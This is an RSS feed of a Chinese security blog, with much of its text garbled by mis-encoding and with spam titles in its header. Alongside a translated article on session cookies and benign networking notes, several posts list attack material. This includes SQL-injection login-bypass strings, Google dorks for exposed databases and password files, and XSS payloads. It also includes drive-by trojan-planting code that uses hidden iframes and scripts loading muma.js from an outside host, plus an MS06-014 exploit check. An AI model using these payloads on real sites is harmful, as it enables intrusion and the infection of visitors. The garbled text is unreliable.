??xml version="1.0" encoding="utf-8" standalone="yes"?>亚洲精品成人久久久,嫩草伊人久久精品少妇AV,思思久久99热只有频精品66http://www.shnenglu.com/momoxiao/category/12536.htmlzh-cnSun, 09 Oct 2011 23:04:25 GMTSun, 09 Oct 2011 23:04:25 GMT60Session cookies for web applicationshttp://www.shnenglu.com/momoxiao/archive/2011/10/09/157836.htmlSat, 08 Oct 2011 23:14:00 GMThttp://www.shnenglu.com/momoxiao/archive/2011/10/09/157836.htmlhttp://www.shnenglu.com/momoxiao/comments/157836.htmlhttp://www.shnenglu.com/momoxiao/archive/2011/10/09/157836.html#Feedback0http://www.shnenglu.com/momoxiao/comments/commentRss/157836.htmlhttp://www.shnenglu.com/momoxiao/services/trackbacks/157836.htmlSession cookies for web applications [http://lwn.net/Articles/283383/]
By Jake Edge
May 21, 2008

Two weeks ago on this page, we reported on some Wordpress vulnerabilities that were caused by incorrectly generating authentication cookies. The article was a bit light on details about such cookies, so this follow-up hopes to remedy that. In addition, Steven Murdoch, who discovered both of the holes, recently presented a paper on a new cookie technique that provides some additional safeguards over other schemes.

两周前在此页上,我们报道了由不正生成的w䆾验证 cookies 引v的一?Wordpress 漏洞。那文档对q些 cookies 的细节描q略,q篇后箋的文章希望能解决q个问题。另外,发现q些漏洞?Steven MurdochQ最q发表了关于一U新?cookie 技术的文章Q文章提供了其他Ҏ之`上`的一些额外保护措施?br />
HTTP is a stateless protocol which means that any application that wishes to track multiple requests as a single session must provide its own way to link those requests. This is typically done through cookies, which are opaque blobs of data that are stored by browsers. Cookies are sent to the browser as part of an HTTP response, usually after some kind of authentication is successful. The browser associates the cookie with the URL of the site so that it can send the cookie value back to the server on each subsequent request.

HTTP 是一U无状态的协议Q这意味着M希望跟踪多个h作ؓ单个会话的应用程序,必须提供自己的方式来链接q些h。这通常通过 cookies 来完成,cookies 是浏览器存储的不透明的数据块。通常Q在某种w䆾认证成功后,cookies 被作Z?HTTP 响应的一部分发送给览器。浏览器?cookie 和对应网站的 URL 兌hQ以便它可以在每个后l请求中回?cookie 值到服务器?br />
Servers can then use the value as a key into some kind of persistent storage so that all requests that contain that cookie value are treated as belonging to a particular session. In particular, it represents that the user associated with that session has correctly authenticated. The cookie lasts until it expires or is deleted by the user. When that happens, the user must re-authenticate to get a new cookie which also starts a new session. Users find this annoying if it happens too frequently, so expirations are often quite long.

然后Q服务器可以`用某U持久性存储的键`使用该|使得所有包含该 cookie 值的hQ被视ؓ属于同一个特定会话。特别是Q它代表和该会话兌的那个已l正通过w䆾验证的用戗一?cookie 一直存在,直到q期或被用户删除。此Ӟ用户必须重新q行w䆾验证Q获取一个新 cookieQ同时开始一个新会话。如果它发生的过于频J,会让用户感到ghQ所以到期时间通常相当ѝ?br />
If the user explicitly logs out of the application, any server-side resources that are being used to store state information can be freed, but that is often not the case. Users will generally just close their browser (or tab) while still being logged in. It is also convenient for users to be allowed multiple concurrent sessions, generally from multiple computers, which will cause the number of sessions stored to be larger, perhaps much larger, than the number of users.

如果用户昑ּ地登出应用程序,M用来存储状态信息的服务器端资源会被释放Q但情况l常不是q样。用户通常只是关闭他们的浏览器Q或标签)Q当仍在d状态时。这也允许用h便地Q从不同的计机上用多个ƈ发会话。这导致存储更大的会话数量Q也许比用户数量大许多?br />
Applications could restrict the number of sessions allowed by a user, or ratchet the expiration value way down, but they typically do not for user convenience. This allows for a potential denial of service when an attacker creates so many sessions that the server runs out of persistent storage. For this reason, stateless session cookies [PDF][http://prisms.cs.umass.edu/~kevinfu/papers/webauth_tr.pdf] were created.

应用E序可以限制允许一个用户用的会话敎ͼ或者``Q但它们通常不方便用户用。这允许一个潜在的拒绝服务Q当一个攻击者创建太多会话,以至于服务器用完持久性存储时。出于这个原因,无状态会?cookies 被创建?br />
Stateless session cookies store all of the state information in the cookie itself, so that the server need not keep anything in the database, filesystem, or memory. The data in the cookie must be encoded in such a way that they cannot be forged, otherwise attackers could create cookies that allow them access they should not have. This is essentially where Wordpress went wrong. By not implementing stateless session cookies correctly, a valid cookie for one user could be modified into a valid cookie for a different user.

无状态会?cookies 把所有状态信息存储到 cookie 本nQ服务器不需要在数据库、文件系l或内存中保存Q何信息。Cookie 中的数据必须以不能被伪造的方式~码Q否则攻击者可以创建允总们访问不应该讉K内容?cookies 。实际上q就?Wordpress 出问题的地方。由于没有正用无状态会?cookies Q一个用L有效 cookie 可以被修Ҏ另一个不同用L有效 cookie ?br />
A stateless session cookie has the state data and expiration "in the clear" followed by a secure hash (SHA-256 for example) of those same values along with a key known only by the server. When the server receives the cookie value, it can calculate the hash and if it matches, proceed to use the state information. Because the secret is not known, an attacker cannot create their own cookies with values of their choosing.

一个无状态的会话 cookie 有状态数据和明确的到期时_后跟一个安全哈希|例如 SHA-256Q,该哈希值和只有服务器知道的一个键`对应`。当服务器接收到 cookie |会计哈希|如果匚wQl用其中的状态信息。由于这个密钥是未知的,d者不能用他们选择的值创q cookies ?br />
The other side of that coin is that an attacker can create spoofed cookies if they know the secret. Murdoch wanted to extend the concept such that even getting access to the secret, through a SQL injection or other web application flaw, would not feasibly allow an attacker to create a spoofed cookie. The result is hardened stateless session cookies [PDF][http://www.cl.cam.ac.uk/~sjm217/papers/protocols08cookies.pdf].

币的另一面是Q如果攻击者知道密钥,可以创徏ƺ骗性的 cookies 。Murdoch 希望扩展概念Q得通过 SQL 注入或其?web 应用漏洞讉K密钥后,d者也无法创徏一个欺骗性的 cookie。结果就是强化的无状态会?cookies ?br />
The basic idea behind the scheme is to add an additional field to stateless session cookies that corresponds to an authenticator generated when an account is first set up. This authenticator is generated from the password at account creation by iteratively calculating the cryptographic hash of the password and a long salt value.

该方案背后的基本思\是,l无状态会?cookie 增加一个额外的字段Q这个字D和账户首次讄时生成的一个`w䆾验证器`对应。n份验证器由创̎h的密码生成,生成Ҏ是,q代计算密码的加密哈希和一个长 salt 倹{?br />
Salt is a random string—usually just a few characters long—that is added to a password before it gets hashed, then stored with the password in the clear. It is used to eliminate the use of rainbow tables to crack passwords. Hardened stateless session cookies use a 128-bit salt value, then repeatedly calculate HASH(prev|salt), where prev is the password the first time through and the hash value from the previous calculation on each subsequent iteration.

Salt 是一个随机字W串——通常只有几个字符?#8212;—它在被计哈希值前d到密码中Q然后以明文形式和密码一起存储。它是用来杜l用彩虹表破解密码的。`化`的无状态会?cookies 使用128?salt |然后q代计算 HASH(prev|salt) Q?其中 prev 在第一ơP代时是密码,在以后每ơP代中是上ơ计的 hash 倹{?br />
The number of iterations is large, 256 for example, but not a secret. Once that value is calculated, it is hashed one last time, without the salt, and then stored in the user table as the authenticator. When the cookie value is created after a successful authentication, only the output of the iterative hash itself is placed in the cookie, not the authenticator that is stored in the database. Cookie verification then must do the standard stateless session cookie hash verification, to ensure that the values have not been manipulated, then hash the value in the cookie to verify against authenticator in the database.

q代ơ数是个大的|例如256Q但q不是保密的。D计算出来后,再不使用 salt 哈希一ơ,然后作ؓw䆾验证器存储到用户表中。当 cookie 通过一ơ成功认证被创徏后,只有输出的P代哈希D保存?cookie 中,而不保存数据库中的n份验证器。Cookie 验证必须q行标准的无状态会?cookie 哈希验证Q来保值没有被修改q,然后哈希 cookie 中的值和数据库中的n份验证器Ҏ?br />
If it sounds complicated, it is; the performance of doing 256 hashes is also an issue, but it does protect against the secret key being lost. Because an attacker cannot calculate a valid authenticator value to put in the cookie (doing so would require breaking SHA-256), they cannot create their own spoofed cookies.

如果q听h很复杂,实Q进?56ơ哈希的性能也是一个问题,但它实能避免密钥丢失。因为攻击者无法计一个有效的用户验证器放q?cookie 中(q样做需要突?SHA-256Q,所以他们不能创qƺ骗 cookie ?br />
While it is not clear that the overhead of all of these hash calculations is warranted, it is an interesting extension to the stateless session cookie scheme. In his paper, Murdoch mentions some variations that could be used to further increase the security of the technique.

目前不清楚所有这些哈希计的开销是否有必要,q是一个扩展无状态会?cookie 的有方案。在他的文章中,Murdoch 提到了一些可以进一步提高该技术安全性的变化?br />

---
后面没看明白?br />无状态会?cookie 中的密钥可能被攻击者获取,authenticator Z么不能被d者获取?获取q两个东西的隑ֺ有区别么Q?br />
---
TODO
| hash salt
| 彩虹?/div>

2011-10-09 07:14 发表评论
]]>
|马播报urlhttp://www.shnenglu.com/momoxiao/archive/2010/08/20/124101.htmlFri, 20 Aug 2010 07:48:00 GMThttp://www.shnenglu.com/momoxiao/archive/2010/08/20/124101.htmlhttp://www.shnenglu.com/momoxiao/comments/124101.htmlhttp://www.shnenglu.com/momoxiao/archive/2010/08/20/124101.html#Feedback0http://www.shnenglu.com/momoxiao/comments/commentRss/124101.htmlhttp://www.shnenglu.com/momoxiao/services/trackbacks/124101.htmlhttp://log.mtian.net/
http://bbs.ikaka.com/showforum-20039.aspx
http://bbs.kafan.cn/forum-105-1.html



2010-08-20 15:48 发表评论
]]>
|马解密大讲?/title><link>http://www.shnenglu.com/momoxiao/archive/2010/06/17/118073.html</link><dc:creator>默</dc:creator><author>默</author><pubDate>Thu, 17 Jun 2010 05:22:00 GMT</pubDate><guid>http://www.shnenglu.com/momoxiao/archive/2010/06/17/118073.html</guid><wfw:comment>http://www.shnenglu.com/momoxiao/comments/118073.html</wfw:comment><comments>http://www.shnenglu.com/momoxiao/archive/2010/06/17/118073.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.shnenglu.com/momoxiao/comments/commentRss/118073.html</wfw:commentRss><trackback:ping>http://www.shnenglu.com/momoxiao/services/trackbacks/118073.html</trackback:ping><description><![CDATA[formQ瑞星卡卡技术社?br>by: networkedition<br>======================<br>==================<br>Document.write<br>解密Ҏ之alertҎQ将|马代码中的document.write替换为alert?br>eg.弹出对话?lt;script src=3.css></script><br>   此代码_脓至freshow上操作区域,点击filter按钮Q数据收集区3.css木马|址?br>   点击3.cssQ进行check链接获取|页源代码?br>   解密选项自然选择alpha2Q点击decodeq行解密<br>   点击UP按钮Q将W一ơ解密的l果上翻至上操作区域q行W二ơ解密,解密选项选择escQ获得网马下载地址<br>   点击insert按钮Q将解密出的|马地址插入数据攉?br>   点击all按钮全选,再点击log按钮Q将解密出日志格式化输出?br><br>==================<br><br>Alpha2<br>该加密方式特征,代码开?TYIIIIIIIIIIIIIIII<br>解密ҎQ一ơAlpha2解密Q一ơesc解密<br><br>==================<br>shellcode<br>Shellcode|马特征Q以相同分隔W(一般ؓ%uQ分隔的4位一l的十六q制字符丌Ӏ?br>解密ҎQ?br>-对于直接使用%u来分隔的shellcodeQ通过两次esc可以直接解密出网马地址?br>-对于通过cshellcode形式加密的网马,可以通过代码进行适当处理Q将代码替换为分隔符%uQ,再进行两ơesc解密<br><br>==================<br>Base64<br><br>Base64加密原理Q?摘自聪大牛的博?<br><br>  把每三个字符Q共24?q制的ASCII码,折分成连l??位的ASCII码,再在每个ASCII码前面补00变成8位, 最后对应一个码表来变成~码字符Q?br><br>码表为(??3分别依次对应Q:<br>0对应A………………………………………………………………………………63对应/<br>ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/<br>如果最后不?位数Q则?Q这时后面对应的~码?#8220;=”<br>例:原文Q?nbsp;               a                  b                c<br>  ASCII码:    01100001 | 01100010 | 01100011<br>        分成4个:    011000 | 010110 | 001001 | 100011<br>        补位数Q?00011000 | 00010110 | 00001001 | 00100011<br>        数值大:        24                22                9                  35<br>        对应~码Q?nbsp;       Y                  W                J                  j<br>        ~码l果Q?nbsp;   YWJj<br><br>        如果只有ab两个字符Q则W三个字W用?来代替,q时l果为YWI=<br>        其实按照法Q?对应的编码其实也可以认ؓ是ؓ0Q所以QQ==和QQAA用来解密的话Q都是AQ但是后面补0时用“=”是加密算法自q讄Q所以加密结果只能是QQ==而不会是QQAA<br>知道了加密原理,解密原理反光而行之就行了Q呵?#8230;…<br>-----------------<br>加密特征Q?br><br>    大小写字母及数字hQ末֏能包含等?br>------------------<br>Base64解密ҎQ?br><br>    我们q是以一个实例来单讲解base64解密ҎQ在实际的网马解密中Q这U加密方式很见。今天我们提供一U解密的ҎQ在q里用到的解密工具ؓQnotepad++ q个软g(附g为notepad++)。后l我们还会讲解用一些其他的解密工具来解密base64?br> <br><br>======================<br>US-ASCII<br>加密特征Q代码类似汉字,且代码中包含?lt;meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" /><br>解密ҎQ用freshow工具解密Ӟ解密选项选择US-ASCII,直接一ơdecode卛_<br><br>=====================<br>eval<br>解密ҎQmalzilla->Decode->Run script<br><br>=====================<br>swf<br><br>Flash|马介:flash|马是利用Adobe Flash Player播放器严重安全漏z, d者可以通过_ֿ设计的特DSWF文g实施d。浏览这些特D构造的SWF文gQ会q行d者设定的L代码?br><br>Flash|马解密ҎQ今天我们主要来讲解如何利用(HTMLDecoder)工具Q对flash|马q行解密。此工具由小大牛开发的一ƾ自动网马解密工P内附有flash|马解密功能Q在q里宣传一下小大牛哈。工具下载见附gQ本ơ讲解不提供具体的swf文g下蝲Q防止一些网友不明,胡ؕq行Dpȝ中毒。主要讲解对于flash|马如何解密的方?<br><br>功能-执行QA>PDF/CWS/Zlib Extractor    <br><br>======================<br>PDF<br><br>pdf漏洞介:PDF是由“Adobe Acrobat”制作的,它存在一个攻Lz——可以在PDF文中,利用“Adobe Acrobat”提供的Javascript脚本功能Q执行Q意攻d令?br>解密ҎQpdf|马和swf|马一P解密工具都是可以使用htmldecoder工具Q解密方法和|马解密高񔽋?SWF解密)一栗今天讲解的q个pdf|马Q可以直接用freshowq个工具来解密,因ؓq个pdf包含的shellcode直接可以通过C本看到。小技巧:对于pdf或swf格式的文件我们可以通过C本的方式打开Q直接查看文件的源代码,你会有惊奇的发现Q尤其是|马解密Q里面说不定有你要的网马地址呢,呵呵。本ơ讲解同样不提供pdf文g的下载,以免不明|友Q下载后q行而导致系l中招?br><br>.pdf源文件中复制出来的shellcode代码--带密钥的shellcode--FreShow<br><br><br> <img src ="http://www.shnenglu.com/momoxiao/aggbug/118073.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.shnenglu.com/momoxiao/" target="_blank">默</a> 2010-06-17 13:22 <a href="http://www.shnenglu.com/momoxiao/archive/2010/06/17/118073.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>'or'='or'l典漏洞dhttp://www.shnenglu.com/momoxiao/archive/2010/05/15/115426.htmlFri, 14 May 2010 23:52:00 GMThttp://www.shnenglu.com/momoxiao/archive/2010/05/15/115426.htmlhttp://www.shnenglu.com/momoxiao/comments/115426.htmlhttp://www.shnenglu.com/momoxiao/archive/2010/05/15/115426.html#Feedback0http://www.shnenglu.com/momoxiao/comments/commentRss/115426.htmlhttp://www.shnenglu.com/momoxiao/services/trackbacks/115426.html/**
 *常见模式
**/
'or'='or'
a'or'1=1--
'or 1=1--
"or 1=1--
or 1=1--
'or'a'='a
"or"a'='a
"or"a'='a
')or('a'='a

/**
 *后台文g常见文g?br>**/
admin
ad_login
ad_manage
addmember
adduser
adm_login
admin/admin
admin/admin_login
admin/index
admin/manage
adimin_admin
admin_edit
admin_index
admin_Login
login/...
...

/**
 *关键?br>**/
密码、用户名、后台̎受会员、会员ID、username、password。。?/p>

/**
 *例子
**/
intext:用户?inurl:admin/login.asp



2010-05-15 07:52 发表评论
]]>
google hackhttp://www.shnenglu.com/momoxiao/archive/2010/05/15/115425.htmlFri, 14 May 2010 23:50:00 GMThttp://www.shnenglu.com/momoxiao/archive/2010/05/15/115425.htmlhttp://www.shnenglu.com/momoxiao/comments/115425.htmlhttp://www.shnenglu.com/momoxiao/archive/2010/05/15/115425.html#Feedback1http://www.shnenglu.com/momoxiao/comments/commentRss/115425.htmlhttp://www.shnenglu.com/momoxiao/services/trackbacks/115425.html/**
  *语法
**/
allintext:验证?4800
allintitle:后台登陆
cache:bit.edu.cn  //现在不能用了貌似
define:html
filetype:pdf
info:bit.edu.cn
allinurl:movie  //q个也用不了
link:nsfocus.com
site:nsfocus.com
related:nsfocus.com ///
-----
blue grass      //逻辑?br>blue -grass     //?br>blue or grass
"blue grass"
"bl?e gr?s"
blue grass +com
-----
http://www.googlesyndicatedsearch.com/u/berkeley

/**
 *入R
**/
l对的\?输入保存的\?输入文g的内?inurl:diy.asp
inurl:asp?id=
inurl:php?id= site:sohu.com
to parent directory inurl:inetpub
to parent directory mdb -google

///eg
//filetype:mdb
http://proisk.ru/Northwind.mdb

//to parent directory mdb site:edu.cn
http://netcourse.cug.edu.cn:7310/cug/fire_control/INC/_VTI_CNF/
http://netcourse.cug.edu.cn:7310

//to parent directory "conn.asp" site:edu.cn
http://www.tijmu.edu.cn/cn/dxzhx/new/admin/

//inurl:/inc+conn.asp
------

/**
 *防范-----robot.txt
**/
intext:"User-agent:*" inurl:robot.txt
intext:"Mediapartners-Google" inurl:"robots.txt"
intext:"Disallow:" inurl:robots.txt
intext:"Allow:" inurl"robots.txt"

 

/**
 *常用
**/
allinurl:bbs data
filetype:mdb inurl:database/data
filetype:inc conn
intitile:"index of" data/sh_history/bash_history/passwd



2010-05-15 07:50 发表评论
]]>
【{】跨?例子http://www.shnenglu.com/momoxiao/archive/2010/05/15/115424.htmlFri, 14 May 2010 23:50:00 GMThttp://www.shnenglu.com/momoxiao/archive/2010/05/15/115424.htmlhttp://www.shnenglu.com/momoxiao/comments/115424.htmlhttp://www.shnenglu.com/momoxiao/archive/2010/05/15/115424.html#Feedback0http://www.shnenglu.com/momoxiao/comments/commentRss/115424.htmlhttp://www.shnenglu.com/momoxiao/services/trackbacks/115424.html[1] >'><script>alert('Watchfire XSS Test Successful')</script>
[2] >"><script>alert("Watchfire XSS Test Successful")</script>
[3] </TextArea><script>alert('Watchfire XSS Test Successful')</script>
///囄跨站
[4] >"'><img src="javascript:alert('Watchfire XSS Test Successful')">
[5] >"'><img src=javascript:alert(&quot;Watchfire XSS Test Successful&quot;)>

[6] " style="background:url(javascript:alert('Watchfire XSS Test Successful'))" OA="
[7] --><script>alert('Watchfire XSS Test Successful')</script>
[8] '+alert('Watchfire XSS Test Successful')+'
[9] "+alert('Watchfire XSS Test Successful')+"
[10] >'><%00script>alert('Watchfire XSS Test Successful')</script> (.NET 1.1 specific variant)
[11] >"><%00script>alert("Watchfire XSS Test Successful")</script> (.NET 1.1 specific variant)
[12] >+ACI-+AD4-+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-
[13] %A7%A2%BE%Bc%F3%E3%F2%E9%F0%F4%Be%E1%Ec%E5%F2%F4%A8%A7Watchfire%20XSS%20Test%20Successful%A7%A9%Bc%Af%F3%E3%F2%E9%F0%F4%Be

///-------------------------------------
exec('Updata ['+@t+'] set ['+@c+'] = rtrim(convert(varchar,['+#c+']))')  ???
cast("></title><script> src=http://www.xxx.com/xx.js</script><!-- as varchar(67))')f



2010-05-15 07:50 发表评论
]]>
【{】常用的挂马方式和系l判断等代码http://www.shnenglu.com/momoxiao/archive/2010/05/15/115423.htmlFri, 14 May 2010 23:49:00 GMThttp://www.shnenglu.com/momoxiao/archive/2010/05/15/115423.htmlhttp://www.shnenglu.com/momoxiao/comments/115423.htmlhttp://www.shnenglu.com/momoxiao/archive/2010/05/15/115423.html#Feedback0http://www.shnenglu.com/momoxiao/comments/commentRss/115423.htmlhttp://www.shnenglu.com/momoxiao/services/trackbacks/115423.html一:框架挂马
<iframe src=地址 width=0 height=0></iframe>

?js文g挂马
首先以下代?br>document.write("<iframe width=0 height=0 src=地址></iframe>");
保存为xxx.jsQ?br>则JS挂马代码?br><script language=javascript src=xxx.js></script>

?js变Ş加密
<SCRIPT language="JScript.Encode" src=http://www.upx.com.cn/muma.txt></script>
muma.txt可改成Q意后~

?body挂马
<body onload="window.location=地址;"></body>

?隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + rn<iframe src=">;

?css中挂?br>body {
background-image: url(javascript:document.write("<script src=http://www.upx.com.cn/muma.js></script>"))}

?JAJA挂马
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>

?囄伪装
<html>
<iframe src="|马地址" height=0 width=0></iframe>
<img src="囄地址"></center>
</html>

?伪装调用Q?br><frameset rows="444,0" cols="*">
<frame src="打开|页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="|马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>

?高ƺ骗
<a href="
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="|马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

十一:判断pȝ代码

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>404</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
<BODY>
<SCRIPT language=javascript>
window.status="";
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
window.location.href="tk.htm";
else
window.location.href="upx06014.htm";
</SCRIPT>
</BODY></HTML>

十二:判断是否有ms06014代码

<script language=VBScript>
on error resume next
set server = document.createElement("object")
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File = server.createobject(Adodb.Stream,"")
if Not Err.Number = 0 then
err.clear
document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
else
document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
end if
</script>

十三:djs的代码demo

//dsrc的对?br>var v = document.getElementById("advjs");
//dsrc的参?br>var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute(src));

document.write("<iframe src="document.writeln("<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">");
document.writeln("<HTML><HEAD>");
document.writeln("<META http-equiv=Content-Type content="text/html; charset=big5">");
document.writeln("<META content="MSHTML 6.00.2900.3059" name=GENERATOR></HEAD>");
document.writeln("<BODY> ");
document.writeln("<DIV style="CURSOR: url(
document.writeln("style="CURSOR: url(

//分析src的参数函?br>function getUrlParameterAdv(asName,lsURL){

loU = lsURL.split("?");
if (loU.length>1){

var loallPm = loU[1].split("&");

for (var i=0; i<loallPm.length; i++){
var loPm = loallPm[i].split("=");
if (loPm[0]==asName){
if (loPm.length>1){
return loPm[1];
}else{
return "";
}
}
}
}
return null;
}



2010-05-15 07:49 发表评论
]]>
【{】是否能做到上传目录不执行ASPhttp://www.shnenglu.com/momoxiao/archive/2010/04/30/114042.htmlFri, 30 Apr 2010 03:05:00 GMThttp://www.shnenglu.com/momoxiao/archive/2010/04/30/114042.htmlhttp://www.shnenglu.com/momoxiao/comments/114042.htmlhttp://www.shnenglu.com/momoxiao/archive/2010/04/30/114042.html#Feedback0http://www.shnenglu.com/momoxiao/comments/commentRss/114042.htmlhttp://www.shnenglu.com/momoxiao/services/trackbacks/114042.htmlOK.让我们测试一下这句话能否通过NTFS权限控制来做?br>
首先我们写一个最单的ASPE序.我这里用了我自己的一个简单的登陆pȝ.
里面又asp.有对外引用的部分.有access数据?br>我们权限设|成
administrators  全部
system  全部
然后主要我们对d的一个everyone权限来测?
因ؓ没有其他用户l了.所以iuser承everyonel的权限
所以是不是不用everyone用iuser用户是一L.

首先只打开everyone用户的读取权?
在高U内昄如下权限
1.列出文g?d数据
2.d属?br>3.d扩展属?br>打开试面登陆.正常

然后高内只保留
1.列出文g?d数据
打开试面.出现ACL登陆框了.看来权限不

再接下来我们试传说中的取消ASP执行权限.
因ؓ只读情况下已l没有执行权限了.
我们现在特别执行权限取?br>1.遍历文g?q行文g -- 拒绝
2.列出文g?d数据 -- 允许
3.d属?-- 允许
4.d扩展属?-- 允许
现在打开ASP试面.仍旧可以正常讉K

׃asp文g对于iis来说只是一个文本文?br>IISdasp文g内容后交由asp.dllq行解析
所以aspq行Ҏ和windows应用E序不同
完全不需要执行权?只需要只L?br>所以不允许aspq行,虽然可以做到,是取消L?br>但是取消L限之?整个目录内所有文仉无法通过iisd
包括囄文g{等.那么上传目录不允许asp执行.{于是上传的所有内定w不能?br>q种讄导致上传内Ҏ无意?

最后我们来看这句话
"能执行ASP脚本的地方不允许写入文g,能写入文件的地方不允许运行ASPE序"
前半句我们可以做?对asp目录只读权限.
后半句虽然严格来说也可以做到.对上传目录取消读权限
但是q样导致上传Q何文仉无法讉K.失去了上传文件功能的意义?

本h试环境
windows2003 中文企业版VLK SP1
IIS 6
---------------------------------------------------------------------
写权限依靠NTFS权限讄Q执行asp依靠IIS讄
-------------------------------------------------------------------

2010-04-30 11:05 发表评论
]]>
【{】用ISA Server 部v三宿ȝDMZ区域Q未完)http://www.shnenglu.com/momoxiao/archive/2010/04/27/113675.htmlTue, 27 Apr 2010 01:23:00 GMThttp://www.shnenglu.com/momoxiao/archive/2010/04/27/113675.htmlhttp://www.shnenglu.com/momoxiao/comments/113675.htmlhttp://www.shnenglu.com/momoxiao/archive/2010/04/27/113675.html#Feedback0http://www.shnenglu.com/momoxiao/comments/commentRss/113675.htmlhttp://www.shnenglu.com/momoxiao/services/trackbacks/113675.htmlhttp://www.microsoft.com/china/community/Column/72.mspx
-------------------------------------------------------------- 
q次W者将介绍如何在企业中利用ISA Server部v一个DMZ区域。一般来讲利用ISA Server可以实现三宿ȝDMZ区域Q也可以实现背靠背的DMZ区域。本文讨论的焦点是三宿主的DMZ区域?/p>

 首先Q我们谈谈ؓ何要部vDMZ区域Q也是说一旦部|了DMZQ他对你的网l生什么样的积极作用。有些企业可能从ISP甌了一个地址D늚IPQ但是往往出现q些IP不能有效的利用,构徏了DMZ区域后,q些IP可以灉|的分配到DMZ上的L。此外,从DMZ区域到Internet动的数据包是被路由的,而不是被NATQ从ISA处理数据包的效率角度Ԍ前者要优于后者?br> 现在Q我们来看看要部|DMZ需要哪些条?br> - ISA需要有臛_3个网l接口卡
 - ISA Server是做为防火墙模式或者集成模式安装的Q可以是单机模式也可以是阵列模式
 - 在IP PACKET Filter的全局讄中,必须启用Enable IP Routing
 - ISP分配了一个地址D늚IPl你的公?br> - 配置在ISA外部接口的IP的子|掩码不能与DMZ区域的子|掩码相?/p>

 在这文章里Q笔者以一个模拟的真实环境来描qDMZQ试验的拓扑如图1所C?br>
(?)
 我们假设Q你的公总ISP购买了一个CcȝIPD,172.16.1.0/24。我们将172.16.1.33分配lISA的外部接口。把172.16.1.64/26?72.16.1.0/24划分出来分配lDMZ区域。注意,DMZ区域和ISA外部接口q接的区域是不同的逻辑|络。一个常见的错误是把DMZ区域和ISA外部接口规划在一个IP逻辑|络里。记住,从DMZ和外部网l的通讯角度ԌISA扮演一个有qo功能的\由器Q而不是网桥,q也是ؓ什么必需要启用Enable IP Routing的原因?/p>

 ISA Server的网l接口配|如?/p>

 Internal NIC
 IP:192.168.100.20/24
 Defaul Gateway(DG):None
 DNS:192.168.100.100

 DMZ NIC
 IP:192.168.100.65/26
 DG:None
 DNS:None

 External NIC
 IP:172.16.1.33/24
 DG:172.16.254
 DNS:10.10.10.10

 DMZ上的L的网l接口配|?br> IP:172.16.1.66-126/26
 DG:172.16.1.65
 DNS:None

 内部|络QInternalQ上的计机
 IP:192.168.100.x/24
 DG:192.168.100.20
 DNS:192.168.100.100

 L别注意以上的配置。对于ISA来讲Q缺省网关一定要配置在外部接口,原因很简单,一个去往未知IP的数据包Q目标一定位于Internet上,如果q个IP是在你的公司内部|络Q那么你的网l中的\p|肯定存在问题。既然是dInternet上的QISA必须可以这个数据包从外部接口上送出去,所以缺省网关一定要配置在外部接口上。如果你的其他接口也配置的缺省网养I那么׃定会出现问题Q因为默认情况下Q各个网l接口上配置的缺省网关的Metric都是1Q所以去往未知IP的数据包Q就会从所有配|了~省|关的网卡送出Q也是负蝲均衡Q但是另一个不应该配置~省|关的网卡不能将数据包成功的送到目的IPQ所以导致丢包,甚至无法通讯。内部接口的DNS指向公司内部的DNS服务器。外部接口的DNS指向一个可以解析Internet上所有域名的DNS服务器,q一点很重要Q别忘了ISA要代理Web Proxy Client和FWCq行DNS解析。DMZ接口上,我们q没有配|DNSQ当然你也可以配|。对于DMZ区域上的LQ我们把|关指向ISA的DMZ|络接口Q因为DMZ区域上的L需要与Internet通讯Q确切的讲是被Internet用户讉KQ而ISA是Internet出口的持有者。DNS指向我们也没有在DMZ上的L配置Q因为DMZ应该是一个无人区Q也是说DMZ上应该是一个服务器农场Q而不是被用户使用Q浏览Internet的计机Q所以它没有必要配置DNSQ除非某台服务器q行的服务必M赖与DNS。内部网l的L讄不是此文讨论的重点,所以在q里不展开讨论?br> 